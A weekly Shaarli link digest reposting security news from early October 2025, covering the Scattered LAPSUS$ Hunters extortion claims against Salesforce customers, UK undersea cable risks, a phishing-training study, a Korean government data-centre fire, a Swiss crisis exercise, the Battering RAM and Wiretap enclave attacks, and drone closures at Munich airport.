Quotidien Hebdomadaire Mensuel

Hebdomadaire Shaarli

Tous les liens d'un semaine sur une page.

Semaine 40 (September 29, 2025)

Scattered LAPSUS$ Hunters Ransomware Group Claims New Victims on New Website
  • Daily Dark Web - dailydarkweb.net
    October 3, 2025

The newly formed cybercrime alliance, “Scattered LAPSUS$ Hunters,” has launched a new website detailing its claims of a massive data breach affecting Salesforce and its extensive customer base. This development is the latest move by the group, a notorious collaboration between members of the established threat actor crews ShinyHunters, Scattered Spider, and LAPSUS$. On their new site, the group is extorting Salesforce directly, threatening to leak nearly one billion records with a ransom deadline of October 10, 2025.

This situation stems from a widespread and coordinated campaign that targeted Salesforce customers throughout mid-2025. According to security researchers, the attacks did not exploit a vulnerability in Salesforce’s core platform. Instead, the threat actors, particularly those from the Scattered Spider group, employed sophisticated social engineering tactics.

The primary method involved voice phishing (vishing), where attackers impersonated corporate IT or help desk staff in phone calls to employees of target companies. These employees were then manipulated into authorizing malicious third-party applications within their company’s Salesforce environment. This action granted the attackers persistent access tokens (OAuth), allowing them to bypass multi-factor authentication and exfiltrate vast amounts of data. The alliance has now consolidated the data from these numerous breaches for this large-scale extortion attempt against Salesforce itself.

The website lists dozens of high-profile Salesforce customers allegedly compromised in the campaign. The list of alleged victims posted by the group includes:

Toyota Motor Corporations (🇯🇵): A multinational automotive manufacturer.
FedEx (🇺🇸): A global courier delivery services company.
Disney/Hulu (🇺🇸): A multinational mass media and entertainment conglomerate.
Republic Services (🇺🇸): An American waste disposal company.
UPS (🇺🇸): A multinational shipping, receiving, and supply chain management company.
Aeroméxico (🇲🇽): The flag carrier airline of Mexico.
Home Depot (🇺🇸): The largest home improvement retailer in the United States.
Marriott (🇺🇸): A multinational company that operates, franchises, and licenses lodging.
Vietnam Airlines (🇻🇳): The flag carrier of Vietnam.
Walgreens (🇺🇸): An American company that operates the second-largest pharmacy store chain in the United States.
Stellantis (🇳🇱): A multinational automotive manufacturing corporation.
McDonald’s (🇺🇸): A multinational fast food chain.
KFC (🇺🇸): A fast food restaurant chain that specializes in fried chicken.
ASICS (🇯🇵): A Japanese multinational corporation which produces sportswear.
GAP, INC. (🇺🇸): A worldwide clothing and accessories retailer.
HMH (hmhco.com) (🇺🇸): A publisher of textbooks, instructional technology materials, and assessments.
Fujifilm (🇯🇵): A multinational photography and imaging company.
Instructure.com – Canvas (🇺🇸): An educational technology company.
Albertsons (Jewel Osco, etc) (🇺🇸): An American grocery company.
Engie Resources (Plymouth) (🇺🇸): A retail electricity provider.
Kering (🇫🇷): A global luxury group that manages brands like Gucci, Balenciaga, and Brioni.
HBO Max (🇺🇸): A subscription video on-demand service.
Instacart (🇺🇸): A grocery delivery and pick-up service.
Petco (🇺🇸): An American pet retailer.
Puma (🇩🇪): A German multinational corporation that designs and manufactures athletic footwear and apparel.
Cartier (🇫🇷): A French luxury goods conglomerate.
Adidas (🇩🇪): A multinational corporation that designs and manufactures shoes, clothing, and accessories.
TripleA (aaa.com) (🇺🇸): A federation of motor clubs throughout North America.
Qantas Airways (🇦🇺): The flag carrier of Australia.
CarMax (🇺🇸): A used vehicle retailer.
Saks Fifth (🇺🇸): An American luxury department store chain.
1-800Accountant (🇺🇸): A nationwide accounting firm.
Air France & KLM (🇫🇷/🇳🇱): A major European airline partnership.
Google Adsense (🇺🇸): A program run by Google through which website publishers serve advertisements.
Cisco (🇺🇸): A multinational digital communications technology conglomerate.
Pandora.net (🇩🇰): A Danish jewelry manufacturer and retailer.
TransUnion (🇺🇸): An American consumer credit reporting agency.
Chanel (🇫🇷): A French luxury fashion house.
IKEA (🇸🇪): A Swedish-founded multinational group that designs and sells ready-to-assemble furniture.
According to the actor, the breach involves nearly 1 billion records from Salesforce and its clients. The allegedly compromised data includes:

Sensitive Personally Identifiable Information (PII)
Strategic business records that could impact market position
Data from over 100 other demand instances hosted on Salesforce infrastructure

Submarine cable security is all at sea

• The Register
Mon 29 Sep 2025 // 08:01 UTC
by Danny Bradbury

Feature: Guess how much of our direct transatlantic data capacity runs through two cables in Bude?

The first transatlantic cable, laid in 1858, delivered a little over 700 messages before promptly dying a few weeks later. 167 years on, the undersea cables connecting the UK to the outside world process £220 billion in daily financial transactions. Now, the UK Parliament's Joint Committee on National Security Strategy (JCNSS) has told the government that it has to do a better job of protecting them.

The Committee's report, released on September 19, calls the government "too timid" in its approach to protecting the cables that snake from the UK to various destinations around the world. It warns that "security vulnerabilities abound" in the UK's undersea cable infrastructure, when even a simple anchor-drag can cause major damage.

There are 64 cables connecting the UK to the outside world, according to the report, carrying most of the country's internet traffic. Satellites can't shoulder the data volumes involved, are too expensive, and only account for around 5 percent of traffic globally.

These cables are invaluable to the UK economy, but they're also difficult to protect. They are heavily shielded in the shallow sea close to those points. That's because accidental damage from fishing operations and other vessels is common. On average, around 200 cables suffer faults each year. But as they get further out, the shielding is less robust. Instead, the companies that lay the cables rely on the depth of the sea to do its job (you'll be pleased to hear that sharks don't generally munch on them).

The report praises a strong cable infrastructure, and admits that in some areas at least we have the redundancy in the cable infrastructure to handle disruptions. For example, it notes that 75 percent of UK transatlantic traffic routes through two cables that come ashore in Bude, Cornwall. That seems like quite the vulnerability, but it acknowledges that we have plenty of infrastructure to route around if anything happened to them. There is "no imminent threat to the UK's national connectivity," it soothes.

But it simultaneously cautions against adopting what it describes as "business-as-usual" views in the industry. The government "focuses too much on having 'lots of cables' and pays insufficient attention to the system's actual ability to absorb unexpected shocks," it frets. It warns that "the impacts on connectivity would be much more serious," if onward connections to Europe suffered as part of a coordinated attack.

"While our national connectivity does not face immediate danger, we must prepare for the possibility that our cables can be threatened in the event of a security crisis," it says.

Reds on the sea bed
Who is the most likely to mount such an attack, if anyone? Russia seems front and center, according to experts. It has reportedly been studying the topic for years. Keir Giles, director at The Centre for International Cyber Conflict and senior consulting fellow of the Russia and Eurasia Programme at Chatham House, argues that Russia has a long history of information warfare that stepped up after it annexed Crimea in 2014.

"The thinking part of the Russian military suddenly decided 'actually, this information isolation is the way to go, because it appears to win wars for us without having to fight them'," Giles says, adding that this approach is often combined with choke holds on land-based information sources. Cutting off the population in the target area from any source of information other than what the Russian troops feed them achieves results at low cost.

In a 2021 paper he co-wrote for the NATO Cooperative Cyber Defence Centre of Excellence, he pointed to the Glavnoye upravleniye glubokovodnykh issledovaniy (Main Directorate for Deep-Water Research, or GUGI), a secretive Russian agency responsible for analyzing undersea cables for intelligence or disruption. According to the JCNSS report, this organization operates the Losharik, a titanium-hulled submarine capable of targeting cables at extreme depth.

Shenanigans under the sea
You don't need a fancy submarine to snag a cable, as long as you're prepared to do it in plain sight closer to the coast. The JNCSS report points to several incidents around the UK and the Baltics. November last year saw two incidents. In the first, Chinese-flagged cargo vessel Yi Peng 3 dragged its anchor for 300km and cut two cables between Sweden and Lithuania. That same month, the UK and Irish navies shadowed Yantar, a Russian research ship loitering around UK cable infrastructure in the Irish sea.

The following month saw Cook Islands-flagged ship Eagle S damage one power cable and three data cables linking Finland and Estonia. This May, unaffiliated vessel Jaguar approached an underseas cable off Estonia and was escorted out of the country's waters.

The real problem with brute-force physical damage from vessels is that it's difficult to prove that it's intentional. On one hand, it's perfect for an aggressor's plausible deniability, and could also be a way to test the boundaries of what NATO is willing to tolerate. On the other, it could really be nothing.

"Attribution of sabotage to critical undersea infrastructure is difficult to prove, a situation significantly complicated by the prevalence of under-regulated and illegal shipping activities, sometimes referred to as the shadow fleet," a spokesperson for NATO told us.

"I'd push back on an assertion of a coordinated campaign," says Alan Mauldin, research director at analyst company TeleGeography, which examines undersea cable infrastructure warns. He questions assumptions that the Baltic cable damage was anything other than a SNAFU.

The Washington Post also reported comment from officials on both sides of the Atlantic that the Baltic anchor-dragging was probably accidental. Giles scoffs at that. "Somebody had been working very hard to persuade countries across Europe that this sudden spate of cables being broken in the Baltic Sea, one after another, was all an accident, and they were trying to say that it's possible for ships to drag their anchors without noticing," he says.

One would hope that international governance frameworks could help. The UN Convention on the Law of the Sea [PDF] has a provision against messing with undersea cables, but many states haven't enacted the agreement. In any case, plausible deniability makes things more difficult.

"The main challenge in making meaningful governance reforms to secure submarine cables is figuring out what these could be. Making fishing or anchoring accidents illegal would be disproportionate," says Anniki Mikelsaar, doctoral researcher at Oxford University's Oxford Internet Institute. "As there might be some regulatory friction, regional frameworks could be a meaningful avenue to increase submarine cable security."

The difficulty in pinning down intent hasn't stopped NATO from stepping in. In January it launched Baltic Sentry, an initiative to protect undersea infrastructure in the region. That effort includes frigates, patrol aircraft, and naval drones to keep an eye on what happens both above and below the waves.

Preparing for the worst
Regardless of whether vessels are doing this deliberately or by accident, we have to be prepared for it, especially as cable installation shows no sign of slowing. Increasing bandwidth needs will boost global cable kilometers by 48 percent between now and 2040, says TeleGeography, adding that annual repairs will increase 36 percent between now and 2040.

"Many cable maintenance ships are reaching the end of their design life cycle, so more investment into upgrading the fleets is needed. This is important to make repairs faster," says Mikelsaar.

There are 62 vessels capable of cable maintenance today, and TeleGeography predicts that'll be enough for the next 15 years. However, it takes time to build these vessels and train the operators, meaning that we'll need to start delivering new vessels soon.

The problem for the UK is that it doesn't own any of that repair capacity, says the JNSS. It can take a long time to travel to a cable and repair it, and ships can only work on one at a time. The Committee reported that the UK doesn't own any sovereign repair capacity, and advises that it gets some, prescribing a repair ship by 2030.

"This could be leased to industry on favorable terms during peacetime and made available for Government use in a crisis," it says, adding that the Navy should establish a set of reservists that will be trained and ready to operate the vessel.

Sir Chris Bryant MP, the Minister for Data Protection and Telecoms, told the Committee it that it was being apocalyptic and "over-egging the pudding" by examining the possibility of a co-ordinated attack. "We disagree," the Committee said in the report, arguing that the security situation in the next decade is uncertain.

"Focusing on fishing accidents and low-level sabotage is no longer good enough," the report adds. "The UK faces a strategic vulnerability in the event of hostilities. Publicly signaling tougher defensive preparations is vital, and may reduce the likelihood of adversaries mounting a sabotage effort in the first place."

To that end, it has made a battery of recommendations. These include building the risk of a coordinated campaign against undersea infrastructure into its risk scenarios, and protecting the stations - often in remote coastal locations - where the cables come onto land.

The report also recommends that the Department for Science, Innovation and Technology (DSIT) ensures all lead departments have detailed sector-by-sector technical impact studies addressing widespread cable outages.

"Government works around the clock to ensure our subsea cable infrastructure is resilient and can withstand hostile and non-hostile threats," DSIT told El Reg, adding that when breaks happen, the UK has some of the fastest cable repair times in the world, and there's usually no noticeable disruption."

"Working with NATO and Joint Expeditionary Force allies, we're also ensuring hostile actors cannot operate undetected near UK or NATO waters," it added. "We're deploying new technologies, coordinating patrols, and leading initiatives like Nordic Warden alongside NATO's Baltic Sentry mission to track and counter undersea threats."

Nevertheless, some seem worried. Vili Lehdonvirta, head of the Digital Economic Security Lab (DIESL) and professor of Technology Policy at Aalto University, has noticed increased interest from governments and private sector organizations alike in how much their daily operations depend on oversea connectivity. He says that this likely plays into increased calls for digital sovereignty.

"The rapid increase in data localization laws around the world is partly explained by this desire for increased resilience," he says. "But situating data and workloads physically close as opposed to where it is economically efficient to run them (eg. because of cheaper electricity) comes with an economic cost."

So the good news is that we know exactly how vulnerable our undersea cables are. The bad news is that so does everyone else with a dodgy cargo ship and a good poker face. Sleep tight.

Cybersecurity Training Programs Don’t Prevent Employees from Falling for Phishing Scams

today.ucsd.edu UC San Diego
September 17, 2025
Story by:
Ioana Patringenaru - ipatrin@ucsd.edu

Study involving 19,500 UC San Diego Health employees evaluated the effectiveness of two different types of cybersecurity training

Cybersecurity training programs as implemented today by most large companies do little to reduce the risk that employees will fall for phishing scams–the practice of sending malicious emails posing as legitimate to get victims to share personal information, such as their social security numbers.

That’s the conclusion of a study evaluating the effectiveness of two different types of cybersecurity training during an eight-month, randomized controlled experiment. The experiment involved 10 different phishing email campaigns developed by the research team and sent to more than 19,500 employees at UC San Diego Health.

The team presented their research at the Blackhat conference Aug. 2 to 7 in Las Vegas. The team originally shared their work at the 46th IEEE Symposium on Security and Privacy in May in San Francisco.

Researchers found that there was no significant relationship between whether users had recently completed an annual, mandated cybersecurity training and the likelihood of falling for phishing emails. The team also examined the efficacy of embedded phishing training – the practice of sharing anti-phishing information after a user engages with a phishing email sent by their organization as a test. For this type of training, researchers found that the difference in failure rates between employees who had completed the training and those who did not was extremely low.

“Taken together, our results suggest that anti-phishing training programs, in their current and commonly deployed forms, are unlikely to offer significant practical value in reducing phishing risks,” the researchers write.

Why is it important to combat phishing?

Whether phishing training is effective is an important question. In spite of 20 years of research and development into malicious email filtering techniques, a 2023 IBM study identifies phishing as the single largest source of successful cybersecurity breaches–16% overall, researchers write.

This threat is particularly challenging in the healthcare sector, where targeted data breaches have reached record highs. In 2023 alone, the U.S. Department of Health and Human Services (HHS) reported over 725 large data breach events, covering over 133 million health records, and 460 associated ransomware incidents.

As a result, it has become standard in many sectors to mandate both formal security training annually and to engage in unscheduled phishing exercises, in which employees are sent simulated phishing emails and then provided “embedded” training if they mistakenly click on the email’s links.

Researchers were trying to understand which of these types of training are most effective. It turns out, as currently administered, that none of them are.

Why are cybersecurity trainings not effective?
One reason the trainings are not effective is that the majority of people do not engage with the embedded training materials, said Grant Ho, study co-author and a faculty member at the University of Chicago, who did some of this work as a postdoctoral researcher at UC San Diego. Overall, 75% of users engaged with the embedded training materials for a minute or less. One-third immediately closed the embedded training page without engaging with the material at all.

“This does lend some suggestion that these trainings, in their current form, are not effective,” said Ariana Mirian, another paper co-author, who did the work as a Ph.D. student in the research group of UC San Diego computer science professors Stefan Savage and Geoff Voelker.

study of 19,500 employees over eight months
To date, this is the largest study of the effectiveness of anti-phishing training, covering 19,500 employees at UC San Diego Health. In addition, it’s one of only two studies that used a randomized control trial method to determine whether employees would receive training, and what kind of phishing emails–or lures–they would receive.

After sending 10 different types of phishing emails over the course of eight months, the researchers found that embedded phishing training only reduced the likelihood of clicking on a phishing link by 2%. This is particularly striking given the expense in time and effort that these trainings require, the researchers note.

Researchers also found that more employees fell for the phishing emails as time went on. In the first month of the study, only 10% of employees clicked on a phishing link. By the eighth month, more than half had clicked on at least one phishing link.

In addition, researchers found that some phishing emails were considerably more effective than others. For example, only 1.82% of recipients clicked on a phishing link to update their Outlook password. But 30.8% clicked on a link that purported to be an update to UC San Diego Health’s vacation policy.

Given the results of the study, researchers recommend that organizations refocus their efforts to combat phishing on technical countermeasures. Specifically, two measures would have better return on investment: two-factor authentication for hardware and applications, as well as password managers that only work on correct domains, the researchers write.

This work was supported in part by funding from the University of California Office of the President “Be Smart About Safety” program–an effort focused on identifying best practices for reducing the frequency and severity of systemwide insurance losses. It was also supported in part by U.S. National Science Foundation grant CNS-2152644, the UCSD CSE Postdoctoral Fellows program, the Irwin Mark and Joan Klein Jacobs Chair in Information and Computer Science, the CSE Professorship in Internet Privacy and/or Internet Data Security, a generous gift from Google, and operational support from the UCSD Center for Networked Systems.

NIRS fire destroys government's cloud storage system, no backups available

Korea JoongAng Daily
Wednesday
October 1, 2025
BY JEONG JAE-HONG [yoon.soyeon@joongang.co.kr],D

A fire at the National Information Resources Service (NIRS)'s Daejeon headquarters destroyed the government’s G-Drive cloud storage system, erasing work files saved individually by some 750,000 civil servants, the Ministry of the Interior and Safety said Wednesday.

The fire broke out in the server room on the fifth floor of the center, damaging 96 information systems designated as critical to central government operations, including the G-Drive platform. The G-Drive has been in use since 2018, requiring government officials to store all work documents in the cloud instead of on personal computers. It provided around 30 gigabytes of storage per person.

However, due to the system’s large-capacity, low-performance storage structure, no external backups were maintained — meaning all data has been permanently lost.

The scale of damage varies by agency. The Ministry of Personnel Management, which had mandated that all documents be stored exclusively on G-Drive, was hit hardest. The Office for Government Policy Coordination, which used the platform less extensively, suffered comparatively less damage.

The Personnel Ministry stated that all departments are expected to experience work disruptions. It is currently working to recover alternative data using any files saved locally on personal computers within the past month, along with emails, official documents and printed records.

The Interior Ministry noted that official documents created through formal reporting or approval processes were also stored in the government’s Onnara system and may be recoverable once that system is restored.

“Final reports and official records submitted to the government are also stored in OnNara, so this is not a total loss,” said a director of public services at the Interior Ministry.

The Interior Ministry explained that while most systems at the Daejeon data center are backed up daily to separate equipment within the same center and to a physically remote backup facility, the G-Drive’s structure did not allow for external backups. This vulnerability ultimately left it unprotected.

Criticism continues to build regarding the government's data management protocols.

La Confédération teste ses capacités face aux menaces extérieures

blick.ch
Fabian Eberhard
Publié: 28.09.2025 à 09:57 heures

Cyberattaques, désinformation, tensions russo-européennes: la Suisse se prépare. Les 6 et 7 novembre, l’exercice national EI 25 testera la réaction du pays face aux menaces hybrides. Au programme: simulations de cyberattaques, d'attaques terroristes et d'épidémies.

Cyberattaques, survols de drones, campagnes de désinformation – Vladimir Poutine est-il en train de tester les limites de l'OTAN?

Pour l'heure, rien n'indique que Moscou prévoit une quelconque incursion militaire au sein de nos frontières. Ce qui est certain en revanche, c'est que dans quelques semaines, un exercice de sécurité nationale sera lancé en Suisse, qui simulera un scénario similaire.

Scénario tenu secret
L'exercice intégré 2025 (EI 25) qui aura lieu les 6 et 7 novembre, doit permettre de tester l'organisation stratégique de crise de la Confédération, des cantons et d'autres acteurs, comme les exploitants d'infrastructures critiques – hôpitaux, aéroports, fournisseurs d'énergie.

Le scénario reste secret jusqu'au bout. La Confédération confirme uniquement qu'une «menace hybride contre la Suisse» doit être exercée. «Aucune référence n'est faite à un pays réel ou à des événements réels», explique cependant Urs Bruderer, porte-parole de la Chancellerie fédérale. Mais les initiés partent du principe que le dispositif d'exercice ressemble à une escalade du conflit entre la Russie et l'Europe – avec des conséquences massives.

De célèbres noms y participent
Le scénario a été élaboré par un comité consultatif composé de différents experts, comme Markus Mäder, secrétaire d'Etat à la politique de sécurité de la Confédération, Peter Maurer, ancien président du Comité international de la Croix-Rouge (CICR), et Doris Leuthard, ex-conseillère fédérale du Centre.

Pour cette dernière, il s'agit d'un retour éphémère à la Confédération, après avoir quitté le gouvernement fin 2018. «Les membres du conseil consultatif doivent réunir leurs connaissances et leur expérience au niveau politico-stratégique dans différents domaines thématiques pertinents pour l'exercice», explique Urs Bruderer.

A ce sujet, Doris Leuthard a dirigé le Département fédéral de l'environnement, des transports, de l'énergie et de la communication (Detec) durant son mandat et possède donc une certaine expertise en matière d'infrastructures critiques.

Exercice à vocation internationale
Pour l'EI 25, deux grands exercices ont été réunis: celui de sécurité intégré et celui de conduite stratégique, qui ont par le passé simulé des cyberattaques, des attaques terroristes et des épidémies. Sur la base des expériences tirées de la pandémie Covid-19, le Conseil fédéral a décidé de remplacer les deux exercices par un exercice combiné permettant à la Confédération et aux cantons de tester leur collaboration en situation de crise.

Selon la Confédération, l'entraînement «impliquera un grand nombre d'acteurs au niveau suisse». Urs Bruderer précise également que «la dimension internationale est un aspect important de l'exercice». Les acteurs internationaux ne se déplaceront toutefois pas eux-mêmes, mais seront simulés par des participants suisses.

Intel and AMD trusted enclaves, a foundation for network security, fall to physical attacks

Ars Technica, Dan Goodin – 30 sept. 2025 22:25

The chipmakers say physical attacks aren’t in the threat model. Many users didn’t get the memo.

In the age of cloud computing, protections baked into chips from Intel, AMD, and others are essential for ensuring confidential data and sensitive operations can’t be viewed or manipulated by attackers who manage to compromise servers running inside a data center. In many cases, these protections—which work by storing certain data and processes inside encrypted enclaves known as TEEs (Trusted Execution Enclaves)—are essential for safeguarding secrets stored in the cloud by the likes of Signal Messenger and WhatsApp. All major cloud providers recommend that customers use it. Intel calls its protection SGX, and AMD has named it SEV-SNP.

Over the years, researchers have repeatedly broken the security and privacy promises that Intel and AMD have made about their respective protections. On Tuesday, researchers independently published two papers laying out separate attacks that further demonstrate the limitations of SGX and SEV-SNP. One attack, dubbed Battering RAM, defeats both protections and allows attackers to not only view encrypted data but also to actively manipulate it to introduce software backdoors or to corrupt data. A separate attack known as Wiretap is able to passively decrypt sensitive data protected by SGX and remain invisible at all times.

Attacking deterministic encryption
Both attacks use a small piece of hardware, known as an interposer, that sits between CPU silicon and the memory module. Its position allows the interposer to observe data as it passes from one to the other. They exploit both Intel’s and AMD’s use of deterministic encryption, which produces the same ciphertext each time the same plaintext is encrypted with a given key. In SGX and SEV-SNP, that means the same plaintext written to the same memory address always produces the same ciphertext.

Deterministic encryption is well-suited for certain uses, such as full disk encryption, where the data being protected never changes once the thing being protected (in this case, the drive) falls into an attacker’s hands. The same encryption is suboptimal for protecting data flowing between a CPU and a memory chip because adversaries can observe the ciphertext each time the plaintext changes, opening the system to replay attacks and other well-known exploit techniques. Probabilistic encryption, by contrast, resists such attacks because the same plaintext can encrypt to a wide range of ciphertexts that are randomly chosen during the encryption process.

“Fundamentally, [the use of deterministic encryption] is a design trade-off,” Jesse De Meulemeester, lead author of the Battering RAM paper, wrote in an online interview. “Intel and AMD opted for deterministic encryption without integrity or freshness to keep encryption scalable (i.e., protect the entire memory range) and reduce overhead. That choice enables low-cost physical attacks like ours. The only way to fix this likely requires hardware changes, e.g., by providing freshness and integrity in the memory encryption.”

Daniel Genkin, one of the researchers behind Wiretap, agreed. “It’s a design choice made by Intel when SGX moved from client machines to server,” he said. “It offers better performance at the expense of security.” Genkin was referring to Intel’s move about five years ago to discontinue SGX for client processors—where encryption was limited to no more than 256 MB of RAM—to server processors that could encrypt terabytes of RAM. The transition required Intel to revamp the encryption to make it scale for such vast amounts of data.

“The papers are two sides of the same coin,” he added.

While both of Tuesday’s attacks exploit weaknesses related to deterministic encryption, their approaches and findings are distinct, and each comes with its own advantages and disadvantages. Both research teams said they learned of the other’s work only after privately submitting their findings to the chipmakers. The teams then synchronized the publish date for Tuesday. It’s not the first time such a coincidence has occurred. In 2018, multiple research teams independently developed attacks with names including Spectre and Meltdown. Both plucked secrets out of Intel and AMD processors by exploiting their use of performance enhancement known as speculative execution.

AMD declined to comment on the record, and Intel didn’t respond to questions sent by email. In the past, both chipmakers have said that their respective TEEs are designed to protect against compromises of a piece of software or the operating system itself, including in the kernel. The guarantees, the companies have said, don’t extend to physical attacks such as Battering RAM and Wiretap, which rely on physical interposers that sit between the processor and the memory chips. Despite this limitation, many cloud-based services continue to trust assurances from the TEEs even when they have been compromised through physical attacks (more about that later).

Intel on Tuesday published this advisory. AMD posted one here.

Battering RAM
Battering RAM uses a custom-built analog switch to act as an interposer that reads encrypted data as it passes between protected memory regions in DDR4 memory chips and an Intel or AMD processor. By design, both SGX and SEV-SNP make this ciphertext inaccessible to an adversary. To bypass that protection, the interposer creates memory aliases in which two different memory addresses point to the same location in the memory module.

The Battering-RAM interposer, containing two analog switches (bottom center), is controlled by a microcontroller (left). The switches can dynamically either pass through the command signals to the connected DIMM or connect the respective lines to ground.

The Battering-RAM interposer, containing two analog switches (bottom center), is controlled by a microcontroller (left). The switches can dynamically either pass through the command signals to the connected DIMM or connect the respective lines to ground. Credit: De Meulemeester et al.

“This lets the attacker capture a victim's ciphertext and later replay it from an alias,” De Meulemeester explained. “Because Intel's and AMD's memory encryption is deterministic, the replayed ciphertext always decrypts into valid plaintext when the victim reads it.” The PhD researcher at KU Leuven in Belgium continued:

When the CPU writes data to memory, the memory controller encrypts it deterministically, using the plaintext and the address as inputs. The same plaintext written to the same address always produces the same ciphertext. Through the alias, the attacker can't read the victim's secrets directly, but they can capture the victim's ciphertext. Later, by replaying this ciphertext at the same physical location, the victim will decrypt it to a valid, but stale, plaintext.

This replay capability is the primitive on which both our SGX and SEV attacks are built.

In both cases, the adversary installs the interposer, either through a supply-chain attack or physical compromise, and then runs either a virtual machine or application at a chosen memory location. At the same time, the adversary also uses the aliasing to capture the ciphertext. Later, the adversary replays the captured ciphertext, which, because it's running in the region the attacker has access to, is then replayed as plaintext.

Because SGX uses a single memory-encryption key for the entire protected range of RAM, Battering RAM can gain the ability to write or read plaintext into these regions. This allows the adversary to extract the processor’s provisioning key and, in the process, break the attestation SGX is supposed to provide to certify its integrity and authenticity to remote parties that connect to it.

AMD processors protected by SEV use a single encryption key to produce all ciphertext on a given virtual machine. This prevents the ciphertext replaying technique used to defeat SGX. Instead, Battering RAM captures and replays the cryptographic elements that are supposed to prove the virtual machine hasn’t been tampered with. By replaying an old attestation report, Battering RAM can load a backdoored Virtual machine that still carries the SEV-SNP certification that the VM hasn’t been tampered with.

The key benefit of Battering RAM is that it requires equipment that costs less than $50 to pull off. It also allows active decryption, meaning encrypted data can be both read and tampered with. In addition, it works against both SGX and SEV-SNP, as long as they work with DDR4 memory modules.

Wiretap
Wiretap, meanwhile, is limited to breaking only SGX working with DDR4, although the researchers say it would likely work against the AMD protections with a modest amount of additional work. Wiretap, however, allows only for passive decryption, which means protected data can be read, but data can’t be written to protected regions of memory. The cost of the interposer and the equipment for analyzing the captured data also costs considerably more than Battering RAM, at about $500 to $1,000.

Like Battering RAM, Wiretap exploits deterministic encryption, except the latter attack maps ciphertext to a list of known plaintext words that the ciphertext is derived from. Eventually, the attack can recover enough ciphertext to reconstruct the attestation key.

Genkin explained:

Let’s say you have an encrypted list of words that will be later used to form sentences. You know the list in advance, and you get an encrypted list in the same order (hence you know the mapping between each word and its corresponding encryption). Then, when you encounter an encrypted sentence, you just take the encryption of each word and match it against your list. By going word by word, you can decrypt the entire sentence. In fact, as long as most of the words are in your list, you can probably decrypt the entire conversation eventually. In our case, we build a dictionary between common values occurring within the ECDSA algorithm and their corresponding encryption, and then use this dictionary to recover these values as they appear, allowing us to extract the key.

The Wiretap researchers went on to show the types of attacks that are possible when an adversary successfully compromises SGX security. As Intel explains, a key benefit of SGX is remote attestation, a process that first verifies the authenticity and integrity of VMs or other software running inside the enclave and hasn’t been tampered with. Once the software passes inspection, the enclave sends the remote party a digitally signed certificate providing the identity of the tested software and a clean bill of health certifying the software is safe.

The enclave then opens an encrypted connection with the remote party to ensure credentials and private data can’t be read or modified during transit. Remote attestation works with the industry standard Elliptic Curve Digital Signature Algorithm, making it easy for all parties to use and trust.

Blockchain services didn’t get the memo
Many cloud-based services rely on TEEs as a foundation for privacy and security within their networks. One such service is Phala, a blockchain provider that allows the drafting and execution of smart contracts. According to the company, computer “state”—meaning system variables, configurations, and other dynamic data an application depends on—are stored and updated only in the enclaves available through SGX, SEV-SNP, and a third trusted enclave available in Arm chips known as TrustZone. This design allows these smart contract elements to update in real time through clusters of “worker nodes”—meaning the computers that host and process smart contracts—with no possibility of any node tampering with or viewing the information during execution.

“The attestation quote signed by Intel serves as the proof of a successful execution,” Phala explained. “It proves that specific code has been run inside an SGX enclave and produces certain output, which implies the confidentiality and the correctness of the execution. The proof can be published and validated by anyone with generic hardware.” Enclaves provided by AMD and Arm work in a similar manner.

The Wiretap researchers created a “testnet,” a local machine for running worker modes. With possession of the SGX attestation key, the researchers were able to obtain a cluster key that prevents individual nodes from reading or modifying contract state. With that, Wiretap was able to fully bypass the protection. In a paper, the researchers wrote:

We first enter our attacker enclave into a cluster and note it is given access to the cluster key. Although the cluster key is not directly distributed to our worker upon joining a cluster, we initiate a transfer of the key from any other node in the cluster. This transfer is completed without on-chain interaction, given our worker is part of the cluster. This cluster key can then be used to decrypt all contract interactions within the cluster. Finally, when our testnet accepted our node’s enclave as a gatekeeper, we directly receive a copy of the master key, which is used to derive all cluster keys and therefore all contract keys, allowing us to decrypt the entire testnet.

The researchers performed similar bypasses against a variety of other blockchain services, including Secret, Crust, and IntegriTEE. After the researchers privately shared the results with these companies, they took steps to mitigate the attacks.

Both Battering RAM and Wiretap work only against DDR4 forms of memory chips because the newer DDR5 runs at much higher bus speeds with a multi-cycle transmission protocol. For that reason, neither attack works against a similar Intel protection known as TDX because it works only with DDR5.

As noted earlier, Intel and AMD both exclude physical attacks like Battering RAM and Wiretap from the threat model their TEEs are designed to withstand. The Wiretap researchers showed that despite these warnings, Phala and many other cloud-based services still rely on the enclaves to preserve the security and privacy of their networks. The research also makes clear that the TEE defenses completely break down in the event of an attack targeting the hardware supply chain.

For now, the only feasible solution is for chipmakers to replace deterministic encryption with a stronger form of protection. Given the challenges of making such encryption schemes scale to vast amounts of RAM, it’s not clear when that may happen.

Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him at here on Mastodon and here on Bluesky. Contact him on Signal at DanArs.82.

Munich Airport Drone Sightings Force Flight Cancellations, Adding To Wave Of European Incidents

dronexl.co Haye Kestelooo october 2, 2025

Drone sightings Thursday evening forced Germany’s Munich airport to suspend operations, cancelling 17 flights and disrupting travel for nearly 3,000

Drone sightings Thursday evening forced Germany’s Munich airport to suspend operations, cancelling 17 flights and disrupting travel for nearly 3,000 passengers. The incident marks the latest in a concerning series of mysterious drone closures at major European airports—but whether these sightings represent genuine security threats or mass misidentification remains an urgent question.

The pattern echoes both recent suspected hybrid attacks in Scandinavia and last year’s New Jersey drone panic that turned out to be largely misidentified aircraft and celestial objects.

Munich Operations Suspended for Hours
German air traffic control restricted flight operations at Munich airport from 10:18 p.m. local time Thursday after multiple drone sightings, later suspending them entirely. The airport remained closed until 2:59 a.m. Friday (4:59 a.m. local time).

Another 15 arriving flights were diverted to Stuttgart, Nuremberg, Vienna, and Frankfurt. Flight tracking service Flightradar24 confirmed the airport would remain closed until early Friday morning.

The first arriving flight was expected at 5:25 a.m., with the first departure scheduled for 5:50 a.m., according to the airport’s website.

European Airports on Edge After Suspected Russian Incidents
The Munich closure comes just days after a wave of drone incidents shut down multiple airports across Denmark and Norway in late September. Copenhagen Airport closed for nearly four hours on September 22 after two to three large drones were spotted in controlled airspace. Oslo’s Gardermoen Airport also briefly closed that same night.

Danish Prime Minister Mette Frederiksen called those incidents “the most serious attack on Danish critical infrastructure to date” and suggested Russia could be behind the disruption. Danish authorities characterized the activity as a likely hybrid operation intended to unsettle the public and disrupt critical infrastructure.

Several more Danish airports—including Aalborg, Billund, and military bases—experienced similar incidents in the following days. Denmark is now considering whether to invoke NATO’s Article 4, which enables member states to request consultations over security concerns.

